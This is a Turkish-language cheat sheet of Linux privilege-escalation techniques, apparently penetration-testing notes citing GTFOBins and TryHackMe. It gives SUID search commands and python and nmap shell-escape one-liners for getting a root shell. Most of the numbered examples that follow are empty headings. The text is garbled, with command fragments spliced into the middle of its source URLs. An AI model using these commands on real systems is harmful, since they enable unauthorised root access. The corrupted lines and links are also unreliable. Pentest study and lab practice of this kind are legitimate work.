Yetki Yükseltme
sudo -l

yetki yükseltilebilecek dosyaları arama komutları
find / -perm -u=s -type f 2>/dev/null
find / -user root -perm /4000
find / -user root -perm -4000 -exec ls -ldb {} \;
bir yetki yükseltme python komutu örneği;
usr/bin/python -c ‘import os; os.execl(“/bin/sh”,”sh”,”-p”)’
python3 -c ‘import pty; pty.spawn(“/bin/bash”)’
kaynak: https://gtfobins.github.io/gtfobifind usr/bin/python -c ‘import os; os.execl(“/bin/sh”,”sh”,”-p”)’/ -user root -perm /4000ns/python/
bir başka yetki yükseltme komutu:
sudo bash
Privilege Escalation with Path Variable Manipulation
find / -perm -u=s -type f 2>/dev/null
Find all the SUID/SGID executables on the Debian VM:
find / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} \; 2> /dev/null
https://www.siberportal.org/red-tefind / -type f -a ( -perm -u+s -o -perm -g+s ) -exec ls -l {} \; 2> /dev/nullam/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/
Yetki Yükseltme Örnek-1 :

python -c ‘import pty; pty.spawn(“/bin/sh”)’

find / -perm -u=s -type f 2>/dev/null

nmap –interactive
nmap> !sh

Yetki Yükseltme Örnek-2 :

Yetki Yükseltme Örnek-3 :
cron ve tar ile;
kaynak: https://tryhackme.com/ronmap –interactiveom/linuxprivesc

Yetki Yükseltme Örnek-4 :

Yetki Yükseltme Örnek-5 :
PATH ile;

Yetki Yükseltme Örnek-6 :
bash version <4.2-048 ise;

Yetki Yükseltme Örnek-7 :

Yetki Yükseltme Örnek-8 :
“hidden history files” ile ;

Yetki Yükseltme Örnek-9 :
“config files” ile ;

Yetki Yükseltme Örnek-10 :
“root_keys - SSH Keys, backups ile;

Yetki Yükseltme Örnek-11 :
“NFS servisi ile remote user;

Yetki Yükseltme Örnek-12 :
“Linux Exploit Suggester 2 ile;
